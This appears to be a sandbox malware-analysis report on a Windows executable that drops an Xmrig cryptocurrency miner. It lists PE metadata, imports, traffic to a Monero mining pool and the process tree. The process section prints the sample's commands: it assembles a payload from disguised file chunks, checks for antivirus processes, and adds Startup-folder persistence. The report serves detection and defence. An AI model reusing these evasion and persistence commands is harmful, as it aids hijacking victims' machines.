                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .rsrc0x1000000x1993e0x19a009489d090ecf077e17eb90ebf64e83539False0.9276200457317073data7.720164356286416IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x11a0000xfd60x100063f44dc7ce4332517505661bf812c553False0.59423828125data5.570368511133667IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                    Resources

                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_ICON0x1002800x1114dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004144929607661
                                                                                                    RT_ICON0x1113d00x233aPNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9780439121756487
                                                                                                    RT_ICON0x11370c0x208cPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0013202112337973
                                                                                                    RT_ICON0x1157980x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.5310211554109032
                                                                                                    RT_ICON0x117e000x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.6493624772313297
                                                                                                    RT_ICON0x118f280x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7606382978723404
                                                                                                    RT_DIALOG0x1193900x100dataEnglishUnited States0.5234375
                                                                                                    RT_DIALOG0x1194900x11cdataEnglishUnited States0.6056338028169014
                                                                                                    RT_DIALOG0x1195ac0x60dataEnglishUnited States0.7291666666666666
                                                                                                    RT_GROUP_ICON0x11960c0x5aTarga image data - Map 32 x 4429 x 1 +1EnglishUnited States0.7888888888888889
                                                                                                    RT_MANIFEST0x1196680x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                    Imports

                                                                                                    DLLImport
                                                                                                    KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                    USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                    SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                    ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                    VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                    Possible Origin

                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                    EnglishUnited States

                                                                                                    Network Behavior

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Nov 24, 2024 20:25:27.207014084 CET4973510343192.168.2.5163.172.171.111
                                                                                                    Nov 24, 2024 20:25:27.326533079 CET1034349735163.172.171.111192.168.2.5
                                                                                                    Nov 24, 2024 20:25:27.326606035 CET4973510343192.168.2.5163.172.171.111
                                                                                                    Nov 24, 2024 20:25:27.326998949 CET4973510343192.168.2.5163.172.171.111
                                                                                                    Nov 24, 2024 20:25:27.446624041 CET1034349735163.172.171.111192.168.2.5
                                                                                                    Nov 24, 2024 20:25:28.669364929 CET1034349735163.172.171.111192.168.2.5
                                                                                                    Nov 24, 2024 20:25:28.669419050 CET1034349735163.172.171.111192.168.2.5
                                                                                                    Nov 24, 2024 20:25:28.671336889 CET4973510343192.168.2.5163.172.171.111
                                                                                                    Nov 24, 2024 20:25:28.671336889 CET4973510343192.168.2.5163.172.171.111
                                                                                                    Nov 24, 2024 20:25:28.797566891 CET1034349735163.172.171.111192.168.2.5
                                                                                                    Nov 24, 2024 20:25:29.094172955 CET1034349735163.172.171.111192.168.2.5
                                                                                                    Nov 24, 2024 20:25:29.136995077 CET4973510343192.168.2.5163.172.171.111
                                                                                                    Nov 24, 2024 20:25:29.347130060 CET1034349735163.172.171.111192.168.2.5
                                                                                                    Nov 24, 2024 20:25:29.402606964 CET4973510343192.168.2.5163.172.171.111
                                                                                                    Nov 24, 2024 20:25:31.418621063 CET1034349735163.172.171.111192.168.2.5
                                                                                                    Nov 24, 2024 20:25:31.465131044 CET4973510343192.168.2.5163.172.171.111
                                                                                                    Nov 24, 2024 20:25:41.341468096 CET1034349735163.172.171.111192.168.2.5
                                                                                                    Nov 24, 2024 20:25:41.465133905 CET4973510343192.168.2.5163.172.171.111
                                                                                                    Nov 24, 2024 20:25:51.499468088 CET1034349735163.172.171.111192.168.2.5
                                                                                                    Nov 24, 2024 20:25:51.543432951 CET4973510343192.168.2.5163.172.171.111
                                                                                                    Nov 24, 2024 20:26:01.434472084 CET1034349735163.172.171.111192.168.2.5
                                                                                                    Nov 24, 2024 20:26:01.480787992 CET4973510343192.168.2.5163.172.171.111
                                                                                                    Nov 24, 2024 20:26:11.500020027 CET1034349735163.172.171.111192.168.2.5
                                                                                                    Nov 24, 2024 20:26:11.543309927 CET4973510343192.168.2.5163.172.171.111
                                                                                                    Nov 24, 2024 20:26:15.213450909 CET1034349735163.172.171.111192.168.2.5
                                                                                                    Nov 24, 2024 20:26:15.262029886 CET4973510343192.168.2.5163.172.171.111
                                                                                                    Nov 24, 2024 20:26:25.157396078 CET1034349735163.172.171.111192.168.2.5
                                                                                                    Nov 24, 2024 20:26:25.199533939 CET4973510343192.168.2.5163.172.171.111
                                                                                                    Nov 24, 2024 20:26:35.202073097 CET1034349735163.172.171.111192.168.2.5
                                                                                                    Nov 24, 2024 20:26:35.246701002 CET4973510343192.168.2.5163.172.171.111
                                                                                                    Nov 24, 2024 20:26:45.245049953 CET1034349735163.172.171.111192.168.2.5
                                                                                                    Nov 24, 2024 20:26:45.293359995 CET4973510343192.168.2.5163.172.171.111
                                                                                                    Nov 24, 2024 20:26:55.234812021 CET1034349735163.172.171.111192.168.2.5
                                                                                                    Nov 24, 2024 20:26:55.277704000 CET4973510343192.168.2.5163.172.171.111
                                                                                                    Nov 24, 2024 20:27:05.241915941 CET1034349735163.172.171.111192.168.2.5
                                                                                                    Nov 24, 2024 20:27:05.293334007 CET4973510343192.168.2.5163.172.171.111

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Nov 24, 2024 20:25:03.902481079 CET6219753192.168.2.51.1.1.1
                                                                                                    Nov 24, 2024 20:25:04.154067993 CET53621971.1.1.1192.168.2.5
                                                                                                    Nov 24, 2024 20:25:17.464598894 CET5809653192.168.2.51.1.1.1
                                                                                                    Nov 24, 2024 20:25:17.602181911 CET53580961.1.1.1192.168.2.5
                                                                                                    Nov 24, 2024 20:25:27.060687065 CET4992953192.168.2.51.1.1.1
                                                                                                    Nov 24, 2024 20:25:27.204521894 CET53499291.1.1.1192.168.2.5

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Nov 24, 2024 20:25:03.902481079 CET192.168.2.51.1.1.10x1f38Standard query (0)DqnJUgbSFuO.DqnJUgbSFuOA (IP address)IN (0x0001)false
                                                                                                    Nov 24, 2024 20:25:17.464598894 CET192.168.2.51.1.1.10x1f91Standard query (0)DqnJUgbSFuO.DqnJUgbSFuOA (IP address)IN (0x0001)false
                                                                                                    Nov 24, 2024 20:25:27.060687065 CET192.168.2.51.1.1.10x7c4bStandard query (0)xmr-eu2.nanopool.orgA (IP address)IN (0x0001)false

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Nov 24, 2024 20:25:04.154067993 CET1.1.1.1192.168.2.50x1f38Name error (3)DqnJUgbSFuO.DqnJUgbSFuOnonenoneA (IP address)IN (0x0001)false
                                                                                                    Nov 24, 2024 20:25:17.602181911 CET1.1.1.1192.168.2.50x1f91Name error (3)DqnJUgbSFuO.DqnJUgbSFuOnonenoneA (IP address)IN (0x0001)false
                                                                                                    Nov 24, 2024 20:25:27.204521894 CET1.1.1.1192.168.2.50x7c4bNo error (0)xmr-eu2.nanopool.org163.172.171.111A (IP address)IN (0x0001)false
                                                                                                    Nov 24, 2024 20:25:27.204521894 CET1.1.1.1192.168.2.50x7c4bNo error (0)xmr-eu2.nanopool.org51.210.150.92A (IP address)IN (0x0001)false
                                                                                                    Nov 24, 2024 20:25:27.204521894 CET1.1.1.1192.168.2.50x7c4bNo error (0)xmr-eu2.nanopool.org51.195.138.197A (IP address)IN (0x0001)false
                                                                                                    Nov 24, 2024 20:25:27.204521894 CET1.1.1.1192.168.2.50x7c4bNo error (0)xmr-eu2.nanopool.org51.68.137.186A (IP address)IN (0x0001)false
                                                                                                    Nov 24, 2024 20:25:27.204521894 CET1.1.1.1192.168.2.50x7c4bNo error (0)xmr-eu2.nanopool.org51.15.89.13A (IP address)IN (0x0001)false
                                                                                                    Nov 24, 2024 20:25:27.204521894 CET1.1.1.1192.168.2.50x7c4bNo error (0)xmr-eu2.nanopool.org51.195.43.17A (IP address)IN (0x0001)false
                                                                                                    Nov 24, 2024 20:25:27.204521894 CET1.1.1.1192.168.2.50x7c4bNo error (0)xmr-eu2.nanopool.org51.15.61.114A (IP address)IN (0x0001)false

                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    High Level Behavior Distribution

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:0
                                                                                                    Start time:14:24:56
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:4'389'991 bytes
                                                                                                    MD5 hash:978752B65601018DDD10636B648B8E65
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:2
                                                                                                    Start time:14:24:57
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd
                                                                                                    Imagebase:0x790000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:3
                                                                                                    Start time:14:24:57
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:4
                                                                                                    Start time:14:25:00
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:tasklist
                                                                                                    Imagebase:0x710000
                                                                                                    File size:79'360 bytes
                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:5
                                                                                                    Start time:14:25:00
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:findstr /I "wrsa opssvc"
                                                                                                    Imagebase:0xee0000
                                                                                                    File size:29'696 bytes
                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:6
                                                                                                    Start time:14:25:00
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:tasklist
                                                                                                    Imagebase:0x710000
                                                                                                    File size:79'360 bytes
                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:7
                                                                                                    Start time:14:25:00
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                    Imagebase:0xee0000
                                                                                                    File size:29'696 bytes
                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:8
                                                                                                    Start time:14:25:01
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c md 29442
                                                                                                    Imagebase:0x790000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:9
                                                                                                    Start time:14:25:01
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l
                                                                                                    Imagebase:0x790000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:10
                                                                                                    Start time:14:25:01
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\29442\Reynolds.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:Reynolds.com l
                                                                                                    Imagebase:0x7ff7aa0f0000
                                                                                                    File size:1'065'128 bytes
                                                                                                    MD5 hash:C63860691927D62432750013B5A20F5F
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:11
                                                                                                    Start time:14:25:02
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\choice.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:choice /d y /t 5
                                                                                                    Imagebase:0x500000
                                                                                                    File size:28'160 bytes
                                                                                                    MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:12
                                                                                                    Start time:14:25:02
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit
                                                                                                    Imagebase:0x7ff6f0af0000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:13
                                                                                                    Start time:14:25:02
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:15
                                                                                                    Start time:14:25:14
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js"
                                                                                                    Imagebase:0x7ff668b00000
                                                                                                    File size:170'496 bytes
                                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:16
                                                                                                    Start time:14:25:15
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" "C:\Users\user\AppData\Local\CyberSphere Dynamics\M"
                                                                                                    Imagebase:0x7ff752000000
                                                                                                    File size:1'065'128 bytes
                                                                                                    MD5 hash:C63860691927D62432750013B5A20F5F
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:17
                                                                                                    Start time:14:25:20
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\29442\Reynolds.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\29442\Reynolds.com
                                                                                                    Imagebase:0x7ff7aa0f0000
                                                                                                    File size:1'065'128 bytes
                                                                                                    MD5 hash:C63860691927D62432750013B5A20F5F
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:18
                                                                                                    Start time:14:25:25
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:explorer.exe
                                                                                                    Imagebase:0x7ff674740000
                                                                                                    File size:5'141'208 bytes
                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000002.3264299114.00000000012F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:19
                                                                                                    Start time:14:25:25
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:20
                                                                                                    Start time:14:25:34
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr"
                                                                                                    Imagebase:0x7ff752000000
                                                                                                    File size:1'065'128 bytes
                                                                                                    MD5 hash:C63860691927D62432750013B5A20F5F
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:21
                                                                                                    Start time:14:25:36
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr"
                                                                                                    Imagebase:0x7ff752000000
                                                                                                    File size:1'065'128 bytes
                                                                                                    MD5 hash:C63860691927D62432750013B5A20F5F
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:23
                                                                                                    Start time:14:25:42
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:explorer.exe
                                                                                                    Imagebase:0x7ff674740000
                                                                                                    File size:5'141'208 bytes
                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000017.00000002.2486993892.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000017.00000002.2487104363.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:24
                                                                                                    Start time:14:25:43
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Disassembly

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:17.7%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:21%
                                                                                                      Total number of Nodes:1482
                                                                                                      Total number of Limit Nodes:27
